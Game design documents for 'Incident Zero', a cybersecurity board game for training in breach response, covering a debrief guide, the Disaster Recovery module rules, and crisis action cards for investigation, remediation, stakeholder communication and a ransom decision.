Business Impact Understanding: - Recognize financial costs of breaches (not just immediate costs) - Understand regulatory & legal consequences - Learn about reputational damage and customer churn - Recognize insurance and recovery programs
Stakeholder Management: - Communicate effectively with diverse audiences (customers, regulators, media) - Balance transparency with liability reduction - Manage expectations during crisis - Follow regulatory notification requirements (the GDPR 72-hour anchor)
Long-term Recovery: - Incident doesn't end when systems are "fixed" - Organizational recovery takes months/years - Prevention is far cheaper than response - Importance of pre-incident preparation
For Teams That Had Better Detection (Lost Incident Response by Turn 9-10): - "If you'd detected the attack one turn earlier, what would have changed?" - "What one additional control would have triggered detection?" - "How does dwell time (time from compromise to detection) affect these costs?"
For Teams That Lost Quickly (Out of budget by Turn 5-6): - "Why did your investigation fail so quickly?" - "Which budget-saving action actually cost you more in the long run?" - "What would aggressive early investigation have prevented?"
For All Teams: - "How much did this incident actually cost (total financial + reputational)?" - "If detection during Incident Response saves 80% of these costs, what should you invest in detection?" - "How would a pre-prepared incident response plan have helped?" - "What's the value of having a Disaster Recovery plan before you need it?"
Average Breach Costs (2023 data; narrative-only): - Detection Time (Dwell Time): 206 days average - Cost per Compromised Record: $4.50 (varies by industry) - Total Average Cost: $4.5M (for 1M records) - Cost Breakdown: Detection & Analysis 25%, Containment & Eradication 20%, Recovery & Restoration 20%, Legal & Regulatory 15%, PR & Communications 10%, Customer Notifications 10%
Common Mistakes in Real Incidents: - Poor forensic planning → Extended investigation costs - Late customer notification → Regulatory fines + brand damage - Inadequate remediation → Re-compromise (in-game: EVENT-08) - Ransom payment → Funds future attacks; doesn't guarantee data deletion - No incident plan → Chaos and poor decisions
Success Factors in Real Incidents: - Pre-incident planning and training - Clear communication protocols - Rapid forensic investigation - Transparent customer communication - Thorough remediation - Post-incident review and improvements
If a team scores 85+ (Exemplary), they can attempt a post-game Recovery Analysis: spend 5 remaining Budget for a deep forensic review, identify the systemic failure that allowed the Incident Response loss, and describe the detection investment that would have caught it. Models "turning crisis into opportunity."
Disaster Recovery doesn't necessarily end the incident: Week 2 threat hunting discovers a backdoor still active; Week 4 the attacker tries again; Week 8 a new variant appears. Replay DR with the Second Breach event pre-armed. Teams learn that some breaches have long tails.
Add negotiation flavor at debrief: Did the insurer cover this incident? (Many policies restrict or exclude ransom coverage.) How much forensic evidence was preserved for lawsuits? Could you have negotiated the regulatory settlement?
Incident Response teaches: "Catch attacks early" Hardening (after a win) teaches: "Prevent future attacks" Disaster Recovery (after a loss) teaches: "Plan for what you'll miss"
Together, they create a complete incident response curriculum: 1. Detection & Investigation (Incident Response) 2. Hardening & Prevention (Hardening — win path) 3. Crisis Management & Recovery (Disaster Recovery — loss path)
Students learn that even with perfect security, breaches can happen. The question isn't "Will we be attacked?" but "When we're attacked, will we respond effectively?"
Disaster Recovery Phase for Incident Zero For teams that experience the cost of failed detection Emphasizing that response quality matters as much as prevention
docs/standalone-games/disaster-recovery.md
Version: 2.2 - Playtest Edition Duration: 30-45 minutes Players: 1 Threat Orchestrator + 2-4 Blue Team members Best For: Crisis management training, incident response procedures, stakeholder communication
v2.2: the card system is canonical. You play the 13 Crisis Action cards against the 12 Event cards while managing 5 Stakeholder trust meters, over one 8-turn clock. Track advances are deterministic; dice appear only in the optional Justification bonus and ACTION-13's "no guarantee" roll. This guide uses the exact same rules, numbers, and tier table as
docs/rules/module-disaster-recovery.md.
The Disaster Recovery Module teaches players how to manage a real breach — investigation, remediation, stakeholder communication, and the ransom decision — under extreme time and budget pressure.
Players balance three progress tracks (Investigation %, Remediation %, Communication %) and five stakeholder trust meters while an event timeline turns up the heat. At the end, a single Reputation score (0-100) is computed from what they achieved.
From cards/disaster-recovery/:
- 13 Crisis Action cards (ACTION-01 to ACTION-13)
- 12 Event cards (6 Scheduled + 6 Triggered)
- 5 Stakeholder cards (trust meters)
- A d20, and paper for the tracks/trust/budget (tracker sheets: see print pack, coming)
Money mapping: 1 Budget ≈ $50K.
The breach has already succeeded. The Threat Orchestrator reveals the full attack chain:
"Your organization has experienced a significant data breach. Here's what happened:
Attack Chain: 1. Phishing Campaign → Employee clicked malicious link 2. Credential Harvesting → Login credentials captured 3. VPN Access → Attacker gained network access 4. Lateral Movement → Access to production servers 5. Database Exfiltration → 500,000+ customer records stolen
Current Status: - Breach detected; the crisis clock starts now - Attacker demanding $1M ransom (= 20 Budget) or they publish the data - Media starting to ask questions - You have 8 turns (72 narrative hours) to respond
Your Challenge: Investigate the breach, remediate it, and communicate with stakeholders — before the deadlines land."
| Turn | Time | Scheduled Event / Deadline |
|---|---|---|
| 1 | +6h | Internal discovery |
| 2 | +12h | EVENT-01 First Media Coverage; internal legal/executive escalation complete (narrative) |
| 3 | +18h | EVENT-04 Board Meeting |
| 4 | +24h | — |
| 5 | +36h | EVENT-03 Customer Notification Window (ACTION-09 recommended by end of this turn); EVENT-09 Shareholder Pressure (public companies); default ransom deadline (ACTION-13) |
| 6 | +48h | EVENT-02 Regulatory 72h Deadline — escalation begins (-10 Regulator trust per un-notified turn) |
| 7 | +60h | EVENT-12 Government Subpoena (medium/large breaches) |
| 8 | +72h | GDPR 72-hour deadline: ACTION-10 must be complete. Game ends. |
Lay the 6 Triggered events (EVENT-05, -06, -07, -08, -10, -11) face-up where their trigger conditions can be read. Each fires once, when its condition is met.
Default: the final Reputation computation starts at 100. For harder games:
| Scope | Records | Start computation at |
|---|---|---|
| Small (Beginner) | ~50K | 100 (default) |
| Medium (Intermediate) | ~500K | 90 |
| Large (Advanced) | 5M+ | 80 |
1. START OF TURN - Complete any in-flight multi-turn action that finishes now (apply its track advance) - Resolve this turn's Scheduled event; check all un-fired Triggered events - Apply decay/deadline penalties (Customer decay from Turn 3 if no communication yet; Regulator -10/turn from Turn 6 if un-notified) - Announce remaining Budget, tracks, and trust meters
2. BLUE TEAM'S TURN (2-3 minutes discussion) - Play ONE Crisis Action card: pay its cost, apply its track advance — or take the free Holding Statement (0 Budget, +5% Communication) - Multi-turn actions (Duration N): occupy the action slot only on the turn started; the advance completes at the start of the Nth following turn; one in flight at a time - Justification bonus (optional): strong, specific technical justification → roll d20; on 11+ that action's advance gains +5% - ACTION-13 Ransom Decision may be declared at any time before the ransom deadline; it does not use the action slot (once per game)
3. APPLY STAKEHOLDER EFFECTS - Apply the action's trust effects (table below)
4. END OF TURN - Any stakeholder trust at 0% = immediate loss ("the company collapses") - Advance the turn counter; the game ends after Turn 8 (Turn 10 if EVENT-08 fired)
| Card | Category | Cost | Advance | Duration | Trust effects |
|---|---|---|---|---|---|
| ACTION-01 Forensic Analysis | Investigation | 12 | +25% Inv | 2 turns | Regulators +10, Board +5 |
| ACTION-02 Threat Hunting | Investigation | 8 | +15% Inv | 1 turn | — |
| ACTION-03 Log Analysis | Investigation | 5 | +10% Inv | 1 turn | — |
| ACTION-04 Third-Party IR | Investigation | 20 | +30% Inv, +20% Rem | 3 turns | Regulators +15, Board +15 |
| ACTION-05 Patch & Harden | Remediation | 10 | +20% Rem | 1 turn | Executives +5 |
| ACTION-06 Containment | Remediation | 8 | +15% Rem | 1 turn | Executives +5 |
| ACTION-07 Rebuild from Backup | Remediation | 15 | +25% Rem | 2 turns | Exec +5, Cust +5, Board +5 |
| ACTION-08 Credential Reset | Remediation | 6 | +12% Rem | 1 turn | Executives +5 |
| ACTION-09 Customer Notification | Communication | 10 | +20% Comm | 1 turn | Customers +15, Media +5 |
| ACTION-10 Regulatory Notification | Communication | 8 | +10% Comm | 1 turn | Regulators +20 |
| ACTION-11 Media Management | Communication | 12 | +15% Comm | 1 turn | Media +20, Customers +10 |
| ACTION-12 Board Communication | Communication | 9 | +12% Comm | 1 turn | Board +20, Executives +5 |
| ACTION-13 Ransom Decision | Crisis Decision | 0/5/20 | Pay: +20% Rem | Instant | — (scoring only) |
| Holding Statement (free rule) | Communication | 0 | +5% Comm | 1 turn | — (stops Customer decay) |
Declare before the ransom deadline (default: start of Turn 5). One option, once per game:
Data-publication event: if the team has not PAID by the (possibly delayed) deadline: Customer trust -20, Media trust -15, plus the REFUSE penalty if applicable.
Facts: payment may violate OFAC sanctions if the actor is sanctioned; many insurers restrict or exclude ransom coverage; the FBI discourages payment; payment guarantees nothing.
At game end, compute Reputation:
FINAL REPUTATION = 100 (or 90/80 with the scope variant), then apply:
1. TRACK RESULTS (per track: Investigation, Remediation, Communication)
50-100% -> -0 | 25-49% -> -5 | 10-24% -> -10 | 0-9% -> -20
2. STAKEHOLDER TRUST (average of the five meters)
70%+ -> +5 | 50-69% -> 0 | 30-49% -> -10 | below 30% -> -20
3. DECISION & EVENT MODIFIERS (each at most once)
+5 Customers notified transparently by end of Turn 5
+3 per quality investigation completed (ACTION-01 or ACTION-04), MAX +6 per game
-5 / -15 / -20 ACTION-13: Negotiate / Pay / Refuse-and-published
-10 each: EVENT-05 Class Action, EVENT-06 Regulatory Fine, EVENT-08 Second Breach
-15 customers never notified in-game
-20 regulators never notified in-game
4. CLAMP to 0-100.
Worked example: see the module rules (docs/rules/module-disaster-recovery.md) — a 50-Budget team runs ACTION-02, -06, -10, NEGOTIATE, -05, -09 plus Holding Statements and finishes Inv 25 / Rem 35 / Comm 45, trust average 54 → Reputation 85.
| Final Reputation | Outcome | Interpretation |
|---|---|---|
| 85-100 | Exemplary | Crisis well-managed; stakeholder trust preserved; the organization recovers |
| 70-84 | Managed | Adequate response; some damage; recovery likely |
| 55-69 | Damaged | Poor response; significant customer loss; regulatory scrutiny; recovery uncertain |
| 40-54 | Mismanaged | Major reputational/financial damage; leadership changes likely |
| Below 40 | Catastrophic | Company survival in question; CEO likely replaced |
Loss precedence: (1) any stakeholder trust at 0% at any point = immediate loss; (2) otherwise, the tier table above. Below-20% trust is a critical warning state only.
PART 1: INVESTIGATION QUALITY (2 min) 1. "Did you investigate adequately? What's the total impact?" 2. "What important information did you miss?" 3. "Would better forensics have changed your decisions?"
PART 2: COMMUNICATION STRATEGY (2 min) 1. "How did you prioritize stakeholder notifications?" 2. "What would you communicate differently?" 3. "Did transparency help or hurt your reputation?"
PART 3: FINANCIAL DECISIONS (2 min) 1. "Did you pay the ransom? Why or why not?" 2. "What was your total incident cost (Budget spent × $50K, plus deferred penalties)?" 3. "Would different decisions have saved money?"
PART 4: RESPONSE QUALITY (2 min) 1. "If you replayed, what would you do first?" 2. "Which stakeholder relationship was hardest to preserve?" 3. "What was your biggest crisis decision?"
PART 5: REAL-WORLD CONNECTION (2 min) 1. "Compare your spending to actual breaches (Target, Equifax, etc.)" 2. "What's harder: prevention or response?" 3. "Why is it so expensive to manage a real breach?"
Small Breach (Beginner) — 50,000 records, opportunistic attacker, no subpoena (skip EVENT-12), total real-world loss ~$1-5M (narrative).
Medium Breach (Intermediate) — 500,000 records, ransom-seeking criminal group, full event timeline, total loss ~$5-50M (narrative).
Large Breach (Advanced) — 5M+ records, sophisticated attacker, use the scope variant (start computation at 80), total loss ~$50M+ (narrative).
Scope: 50,000 customer passwords exposed. Attacker: opportunistic; ransom demand small — try REFUSE and manage the fallout. Budget: 50. Focus: communicating bad news without panic. Lesson: even small breaches require careful stakeholder management.
Scope: 500,000 records via a compromised vendor. Budget: 50 (+ any carried over from prior modules). Focus: ACTION-04 Third-Party IR shines here; multi-stakeholder communication. Lesson: vendor relationships complicate crisis response.
Scope: 5M+ records; attacker won't negotiate (ACTION-13 offers REFUSE only). Use the scope variant (start at 80). Focus: damage control; accept a "Damaged" tier as a good result. Lesson: some breaches are unwinnable; response quality still matters.
If you scored 70+ (Managed or better): - Continue to Audit & Compliance Module → validate response procedures post-breach - Transition to Hardening Module → prevent similar breaches
If you scored below 70: - Discuss what went wrong - Replay the scenario with different decisions - Study real breach case studies (Target, Equifax, SolarWinds)
Standalone: play again with a different breach type or attacker profile
cards/disaster-recovery/Disaster Recovery Module - Standalone Play Guide Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/disaster-recovery/core-deck/crisis-action-cards.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Crisis Action Cards represent the specific actions an organization can take during a breach to investigate, remediate, and respond. Teams deploy ONE Crisis Action each turn to advance three objectives: Investigation %, Remediation %, and Communication % (each tracked 0-100%). Track advances are deterministic — no dice are required to advance a track.
Money mapping: 1 Budget ≈ $50K. Dollar figures on cards (fines, ransom) use this mapping unless marked narrative-only.
Crisis Actions are organized into three categories, plus one decision card:
Enable faster containment
Remediation Actions (4 cards)
Rebuild infrastructure
Communication Actions (4 cards)
Maintain customer trust
Crisis Decision (1 card)
Some actions list Duration N (N greater than 1). The rule, defined once:
Duration N: the action occupies your action slot only on the turn it is started; its track advance completes and is applied at the start of the Nth following turn. Only one multi-turn action may be in flight at a time. While it is in flight, you may take single-turn actions on later turns, but you may not start another multi-turn action.
Example: ACTION-01 (Duration 2) started on Turn 2 applies its +25% Investigation at the start of Turn 4.
The signature d20 stays as an optional bonus only (it never gates track advancement): when a team plays an Action card with a strong, specific technical justification, the Threat Orchestrator may allow a d20 roll. On 11+, that action's track advance gains +5%. One roll per action card played.
This is a standing rule, not a numbered card. On any turn, instead of playing an Action card, the team may issue a Holding Statement (internal update / brief public status statement):
Category: Investigation Cost: 12 Budget Investigation Advance: +25% Duration: 2 turns (multi-turn action)
Description: Forensic experts analyze compromised systems to determine: - What data was accessed - What was exfiltrated - How long attacker had access - What attack techniques were used - Evidence for legal proceedings
Key Details: - Requires shutting down compromised system (removes it from operation) - Requires forensics team (may need external consultants) - Takes time (2 turns minimum) - Provides detailed evidence - Essential for legal action and regulatory compliance
When to Use: - Need definitive answer about breach scope - Legal action is likely - Compliance investigation required - Regulatory agency involved
Risk if Not Done: - Cannot determine full extent of damage - Cannot properly remediate (may miss persistence) - No evidence for law enforcement - Regulatory penalties for inadequate investigation
Regulatory Impact: - Most breach notification laws require "reasonable investigation" - Forensics evidence may be required for regulatory compliance - Better investigation = stronger regulatory defense
Team Trade-off: - Expensive (12 Budget) - Takes time (2 turns) - But provides high investigation % - Provides evidence for future action
Category: Investigation Cost: 8 Budget Investigation Advance: +15% Duration: 1 turn
Description: Security team proactively searches logs and systems for: - Other compromised systems - Lateral movement indicators - Persistence mechanisms - Command & Control communication - Evidence of data staging
Key Details: - Requires SIEM with good logging (if available) - Team searches for attack indicators - Can discover secondary compromises - Lower cost than forensics but less detailed - Faster than forensics (1 turn)
When to Use: - Need to know if compromise spread - Want to find hidden persistence - Time is critical (forensics takes 2 turns) - Budget is constrained
Risk if Not Done: - May not discover all compromised systems - Attacker may maintain hidden access - May lose evidence over time (logs rotate) - Compliance investigation may be incomplete
Regulatory Impact: - Shows good faith investigation effort - Supports "reasonable investigation" standard - Evidence of proactive security posture
Team Trade-off: - Cheaper than forensics (8 Budget) - Faster (1 turn vs. 2) - Less detailed evidence - Good balance of cost/time/effectiveness
Category: Investigation Cost: 5 Budget Investigation Advance: +10% Duration: 1 turn
Description: Security team reviews available logs (firewall, VPN, Windows Event Log, application logs) to understand: - When breach was discovered - What access was gained - What systems were accessed - What data might have been accessed - Timeline of attack
Key Details: - Requires logs (must have been collecting logs) - Basic analysis of existing logs - Cheapest investigation action - Quick (1 turn) - Limited by log retention/quality - Can be done internally (no external consultants)
When to Use: - Budget is extremely tight - Need quick preliminary understanding - Good logging infrastructure in place - Time is critical
Risk if Not Done: - No understanding of what happened - Cannot determine scope or impact - Regulatory agencies upset about lack of investigation - Potential for incomplete response
Regulatory Impact: - Minimal investigation (may not satisfy "reasonable investigation") - Shows attempt at investigation - Not sufficient as sole investigation method
Team Trade-off: - Cheapest investigation (5 Budget) - Fastest (1 turn) - Limited effectiveness - Often insufficient alone
Category: Investigation (+ Remediation) Cost: 20 Budget Investigation Advance: +30% (+ Remediation +20%) Duration: 3 turns (ongoing engagement)
Description: Bring in external incident response firm (forensics, incident handling, remediation specialists). They conduct: - Comprehensive forensic investigation - Breach scope determination - Remediation recommendations - Expert testimony for legal proceedings - Regulatory coordination
Key Details: - Very expensive (20 Budget) - Takes significant time to mobilize - Provides expert guidance and credibility - Provides evidence acceptable in court - Supports regulatory defense - Multi-turn (Duration 3): occupies your action slot only on the turn started; see Multi-Turn Actions rule
When to Use: - Major breach with legal implications - Need expert investigation for court - Regulatory agency demands expertise - Internal team cannot handle scope - Liability is significant
Benefits: - Expert investigation (higher quality) - Evidence for prosecution - Regulatory/legal credibility - Expert testimony available - Ongoing support (3 turns)
Risk if Not Done: - Without external expertise, breach response may be insufficient - Legal case may fail (poor evidence) - Regulatory penalties for inadequate investigation - May miss critical evidence
Regulatory Impact: - High credibility with regulators - Better legal defense - Shows serious investigation effort - External experts satisfy "reasonable investigation"
Team Trade-off: - Most expensive (20 Budget) - Long commitment (Duration 3 — advances apply at the start of the 3rd following turn) - But provides significant investigation + remediation - Provides external expertise and credibility - While in flight you may take single-turn actions, but no other multi-turn action (v2.2 Multi-Turn rule)
Category: Remediation Cost: 10 Budget Remediation Advance: +20% Duration: 1 turn
Description: Apply patches to the vulnerability that was exploited: - Install OS patches (if vulnerability is OS-level) - Update application (if vulnerability is app-level) - Change default credentials - Remove backdoor accounts - Harden network configuration
Key Details: - Targets the specific vulnerability that was exploited - Must know what vulnerability was exploited (requires investigation) - Can be done on specific systems or organization-wide - Prevents same attack from succeeding again - Does NOT remove attacker if already inside
When to Use: - Know what vulnerability was exploited - Want to prevent re-exploitation - Can apply patch without affecting business - Quick remediation needed
Risk if Not Done: - Attacker can re-exploit same vulnerability - Breach scope may grow - Regulatory agency upset about lack of remediation - Risk of breach happening again
Regulatory Impact: - Shows timely remediation - Prevents recurrence - Good compliance posture - Regulatory agencies expect patching
Team Trade-off: - Moderate cost (10 Budget) - Quick (1 turn) - Fixes vulnerability - But only prevents re-exploitation, doesn't remove attacker
Category: Remediation Cost: 8 Budget Remediation Advance: +15% Duration: 1 turn
Description: Remove compromised systems from network to: - Stop attacker from using compromised system for lateral movement - Prevent attacker from exfiltrating more data - Preserve compromised system for forensics - Limit blast radius of compromise
Key Details: - Disconnect compromised system from network (kill network) - System is still available for forensics - Stops active attacker in that system - Does NOT affect attacker if they're in other systems - May impact business (systems are unavailable)
When to Use: - Know which systems are compromised - Want to stop active attacker - Can tolerate system downtime - Attacker is still actively in system
Risk if Not Done: - Attacker continues using compromised system - Lateral movement continues - More data exfiltration - Attacker may install additional backdoors
Regulatory Impact: - Shows swift containment action - Demonstrates incident response - Limits liability (stopped attacker) - Good compliance posture
Team Trade-off: - Moderate cost (8 Budget) - Quick (1 turn) - Stops active attacker - But impacts business operations
Category: Remediation Cost: 15 Budget Remediation Advance: +25% Duration: 2 turns (restore + verification)
Description: Rebuild compromised systems from backup: - Restore system from clean backup (pre-compromise) - Apply patches to prevent re-exploitation - Restore only clean data - Verify system is clean before returning to production - Monitor restored system for attacker re-entry
Key Details: - Requires backup of system (must exist and be clean) - Takes time to restore (2 turns minimum) - Removes all attacker artifacts - Ensures system is truly clean - Most reliable remediation method - Dependent on backup quality/testing
When to Use: - Backup exists and is verified clean - System compromise is extensive - Want to ensure complete attacker removal - Business can tolerate 2-turn rebuild
Risk if Not Done: - Attacker may maintain persistence (if system not rebuilt) - Restore from backup with attacker in it = no improvement - Compliance may require clean rebuild
Regulatory Impact: - Shows complete remediation - Demonstrates thorough approach - Better regulatory outcome - Shows commitment to clean recovery
Team Trade-off: - Higher cost (15 Budget) - Takes time (2 turns) - But provides complete remediation - Most reliable method
Category: Remediation Cost: 6 Budget Remediation Advance: +12% Duration: 1 turn
Description: Revoke and reset all potentially compromised credentials: - Reset passwords for all accounts that touched compromised system - Revoke tokens/API keys - Reset VPN credentials - Update database passwords - Revoke certificates/SSH keys
Key Details: - Prevents attacker from using stolen credentials - Must do if credentials were compromised (stolen by Mimikatz, etc.) - Can cause business disruption (users locked out) - Quick and important - Often overlooked but critical
When to Use: - Credentials were likely compromised - Attacker had access to credential stores - Need to prevent attacker re-entry via stolen credentials - Quick credential reset is possible
Risk if Not Done: - Attacker can use stolen credentials to re-enter - Lateral movement using stolen creds continues - Breach is not truly contained - Regulatory violation (allowing unauthorized access)
Regulatory Impact: - Essential remediation step - Shows understanding of attack chain - Prevents credential reuse attacks - Regulatory expectation
Team Trade-off: - Low cost (6 Budget) - Quick (1 turn) - Important and often overlooked - Can cause short-term business disruption
Category: Communication Cost: 10 Budget Communication Advance: +20% Duration: 1 turn (but affects later turns) Deadline (v2.2): Recommended by end of Turn 5. If not completed by then: Customer trust -10 at the start of each later turn; if never completed in-game: -15 Reputation at final scoring (deferred statutory violation).
Description: Notify customers that their data may have been breached: - Determine which customers were affected - Prepare notification message - Send via email, mail, or phone - Provide information about what was accessed - Offer credit monitoring/identity protection if applicable - Field customer questions/complaints
Key Details: - Required by breach notification laws ("without unreasonable delay" in California and most U.S. states; GDPR requires notifying individuals without undue delay when risk is high) - Can be very expensive if many customers affected - Notification can cause loss of customer trust - Early notification shows good faith - Delayed notification shows company doesn't care - Impacts Customers stakeholder directly
Regulatory Requirements: - Most laws require notification "without unreasonable delay"; some states set specific outer limits - California: notify without unreasonable delay; CCPA statutory damages fuel class actions - Notification must include: - What information was accessed - Recommended actions - Contact information - Free credit monitoring (sometimes)
When to Use: - Customer data was accessed in breach - Regulatory requirement to notify - Want to rebuild customer trust - Transparency is important
Risk if Not Done: - Regulatory violation (fines, penalties) - Customer discovery + lawsuits - Loss of customer trust (worse than notification) - Reputation damage from cover-up worse than from breach
Regulatory Impact: - Many states REQUIRE customer notification - California law, GDPR, and other state laws all require notification; CCPA statutory damages fuel class actions - Without notification = regulatory violation + fines - Proactive notification = better regulatory relationship
Team Trade-off: - Moderate cost (10 Budget) - Can be done quickly (1 turn) - Required by law (usually) - Impacts Customers stakeholder (see Stakeholder Cards) - Must be done eventually
Category: Communication Cost: 8 Budget Communication Advance: +10% Duration: 1 turn (but ongoing for months) Deadline (v2.2): Must be completed by end of Turn 8 (the GDPR 72-hour anchor). Escalating penalty from Turn 6: if not yet completed, Regulator trust -10 at the start of Turns 6, 7, and 8. If never completed in-game: -20 Reputation at final scoring (deferred fine).
Description: Notify appropriate regulatory agencies: - Contact FBI/Secret Service (federal crimes) - Contact state attorney general (breach notification) - Contact relevant sector regulator (HHS for healthcare, OCC for banking, etc.) - Contact DHS (if critical infrastructure) - Coordinate with law enforcement
Key Details: - Required by law in many cases (healthcare, financial, etc.) - May trigger investigation by law enforcement - Can help recover stolen data - Provides some legal protection - Can delay prosecution (if they're investigating) - Required before public disclosure in some cases
Regulatory Requirements: - EU data (GDPR): Must notify the supervisory authority within 72 hours; fines up to €20M or 4% of global turnover, whichever is HIGHER (narrative-only figure) - Healthcare (HIPAA): Must report to HHS Office for Civil Rights - Financial (GLBA/FFIEC): Must report to banking regulators - Payment cards (PCI-DSS): Must report to card networks - Critical infrastructure: Must report to DHS/CISA
When to Use: - Data breach triggers regulatory requirement - Want law enforcement assistance - Want to establish good faith investigation - Legal team recommends it
Risk if Not Done: - Regulatory violation if required - Law enforcement cannot assist - Company appears to be hiding breach - Regulators may impose penalties
Regulatory Impact: - Required in many cases (legal obligation) - Shows cooperation with authorities - May help recover stolen data - Better regulatory relationship - May reduce penalties (self-reporting)
Team Trade-off: - Moderate cost (8 Budget) - Ongoing (involves multiple turns of coordination) - Required by law (usually) - Impacts Regulators stakeholder (see Stakeholder Cards) - Must be done in most cases
Category: Communication Cost: 12 Budget Communication Advance: +15% Duration: 1 turn (but ongoing for days/weeks)
Description: Manage media coverage and public perception: - Prepare press statement - Contact media proactively - Manage social media response - Coordinate CEO/executive messaging - Defend company reputation - Provide accurate information to media
Key Details: - Can heavily influence public perception - Proactive messaging better than reactive - Media coverage can amplify damage - Poor communication = reputation disaster - Good communication = company "handled it well" - HR firm may be needed (crisis PR)
When to Use: - Breach is significant (likely to attract media) - Company has public reputation risk - Customers are media-aware (B2C more than B2B) - Proactive messaging is possible
Risk if Not Done: - Media covers story with only attacker's perspective - Reputation damage from poor response - Stock price may drop (if public company) - "No comment" looks like company is hiding - Social media amplifies negative coverage
Impact if Done Well: - "Company handled breach responsibly" - Trust is maintained or recovered - Stock price less impacted - Reputation damage is contained - Customer retention better
Team Trade-off: - Higher cost (12 Budget) - Ongoing (multiple turns) - Impacts Media/Board stakeholder (see Stakeholder Cards) - Critical for public companies - Can significantly affect perception
Category: Communication Cost: 9 Budget Communication Advance: +12% Duration: 1 turn (but triggers Board Meeting - see Event Cards)
Description: Inform board of directors and shareholders about breach: - Prepare incident briefing for board - Present forensics findings - Discuss regulatory/legal implications - Present remediation plan and costs - Discuss risk mitigation going forward - Field board questions
Key Details: - Board must be informed promptly - Disclosure may be required (SEC rules if public company) - Board has fiduciary duty to inform shareholders - Lawsuit risk if board hides information - Board can fire CEO if response is poor - Must include implications for D&O insurance
Regulatory Requirements: - SEC disclosure rules (if public company) - State corporate law (fiduciary duty) - Insurance requirements (D&O coverage)
When to Use: - Board needs to understand breach - Public company (SEC disclosure likely needed) - Board questions will come (better to be prepared) - Shareholder lawsuits are likely
Risk if Not Done: - Board discovers breach from media = crisis of confidence - Shareholder lawsuits for non-disclosure - SEC investigation for disclosure violations - CEO may be fired (looked like hiding information) - Stock price crashes when discovered
Impact if Done Well: - Board is informed and supportive - No surprise when disclosed - Board can defend company (if sued) - Stock market takes news in stride - Organized response is possible
Team Trade-off: - Moderate cost (9 Budget) - Critical for public companies - Impacts Board stakeholder (see Stakeholder Cards) - Required by law (usually) - Complete before EVENT-04 (Board Meeting, scheduled Turn 3) to be "prepared" (see Event Cards)
Category: Crisis Decision Cost: Varies by option (see below) Timing: Play at any time before the ransom deadline (default: start of Turn 5). Playing this card does NOT use your turn's action slot — it is a decision made in addition to your normal action. Once per game. If no decision is made by the deadline, the team is treated as having chosen REFUSE. Used only in scenarios with a ransom/extortion demand.
Choose exactly ONE option:
Option A — PAY - Cost: 20 Budget (≈ $1M at 1 Budget ≈ $50K) - Reputation: -15 at final scoring - Effect: The data-publication event is skipped/cancelled. +20% Remediation immediately (decryption keys restore systems). - No guarantee: The Threat Orchestrator rolls a d20. On 1-5, the keys don't work — no refund, and the Remediation advance is +0% instead of +20%. (The publication event stays cancelled; the attacker took the money and moved on.) - Flavor: "Criminals are not a customer-service organization."
Option B — NEGOTIATE - Cost: 5 Budget (negotiator/counsel fees) - Reputation: -5 at final scoring - Effect: The data-publication event is delayed by 2 turns (default: from start of Turn 5 to start of Turn 7). Buys time to notify stakeholders and remediate before publication.
Option C — REFUSE - Cost: 0 Budget - Reputation: No immediate change. If the data-publication event triggers later: -20 Reputation at final scoring. - Effect: No payment, no delay. Focus budget on investigation, remediation, and communication.
Data-Publication Event (reference): In ransom scenarios, if the team has not PAID by the ransom deadline (default: start of Turn 5; +2 turns if NEGOTIATE), the attacker publishes stolen data: Customer trust -20, Media trust -15 (and the REFUSE scoring penalty above, if applicable).
Legal & practical facts (corrected v2.2): - Payment may violate OFAC sanctions if the threat actor is sanctioned; many insurers restrict or exclude ransom coverage - Law enforcement (FBI) discourages payment — it funds and incentivizes future attacks - Payment does not guarantee data deletion or working keys
Educational Purpose: There is no "right" answer — payment is a genuine trade-off between operational recovery, ethics, legality, and reputation.
| Card | Category | Cost | Advance | Duration | Key Benefit |
|---|---|---|---|---|---|
| ACTION-01 | Investigation | 12 | +25% | 2 turns | Expert forensics |
| ACTION-02 | Investigation | 8 | +15% | 1 turn | Find hidden compromises |
| ACTION-03 | Investigation | 5 | +10% | 1 turn | Quick log analysis |
| ACTION-04 | Investigation | 20 | +30% Inv / +20% Rem | 3 turns | Third-party expertise |
| ACTION-05 | Remediation | 10 | +20% | 1 turn | Fix vulnerability |
| ACTION-06 | Remediation | 8 | +15% | 1 turn | Contain attacker |
| ACTION-07 | Remediation | 15 | +25% | 2 turns | Clean rebuild |
| ACTION-08 | Remediation | 6 | +12% | 1 turn | Revoke access |
| ACTION-09 | Communication | 10 | +20% | 1 turn | Notify customers (by Turn 5) |
| ACTION-10 | Communication | 8 | +10% | 1 turn | Notify regulators (by Turn 8) |
| ACTION-11 | Communication | 12 | +15% | 1 turn | Media management |
| ACTION-12 | Communication | 9 | +12% | 1 turn | Board notification (before Turn 3) |
| ACTION-13 | Crisis Decision | 0/5/20 | Pay: +20% Rem | Instant | Ransom decision (once per game) |
| Free | Communication | 0 | +5% | 1 turn | Holding Statement (standing rule, not a card) |
Budget floor (v2.2): Budget can never go below 0. If you cannot afford any card, the free Holding Statement is always available.
Teams must balance three objectives (each goes 0-100%): - Investigation %: Understand scope and impact - Remediation %: Fix vulnerability and remove attacker - Communication %: Manage stakeholders and public perception
Investigation-Heavy Strategy: - Spend early turns investigating (ACTION-01, ACTION-02, ACTION-04) - Then remediate with full knowledge - Advantage: Know exactly what happened - Disadvantage: Takes time, attacker may still be active
Remediation-Heavy Strategy: - Contain and clean immediately (ACTION-06, ACTION-07, ACTION-08) - Investigate after containment - Advantage: Stop attacker quickly - Disadvantage: May miss something, incomplete cleanup
Balanced Strategy: - Do some investigation + some remediation each turn - Use cheaper actions (ACTION-03, ACTION-06, ACTION-08) - Save expensive actions for critical moments - Advantage: Steady progress on all three objectives
Early Communication: - Notify stakeholders early (ACTION-09, ACTION-10, ACTION-12) - Show proactive response - Maintain trust and credibility
Late Communication: - Wait until full picture is known - Risk: Stakeholders discover from media - Risk: Looks like hiding information
Selective Communication: - Notify regulators (required by law) - Delay customer notification (if allowed) - Focus on internal response first
With 50 Budget, the mandatory crisis beats are always affordable:
Cheapest mandatory path: 5 + 8 + 10 + 6 = 29 Budget. A stronger balanced path (ACTION-02 + ACTION-10 + ACTION-09 + ACTION-05 + ACTION-06) costs 44 Budget — still within 50.
Disaster Recovery Module: Crisis Action Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/disaster-recovery/core-deck/event-cards.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
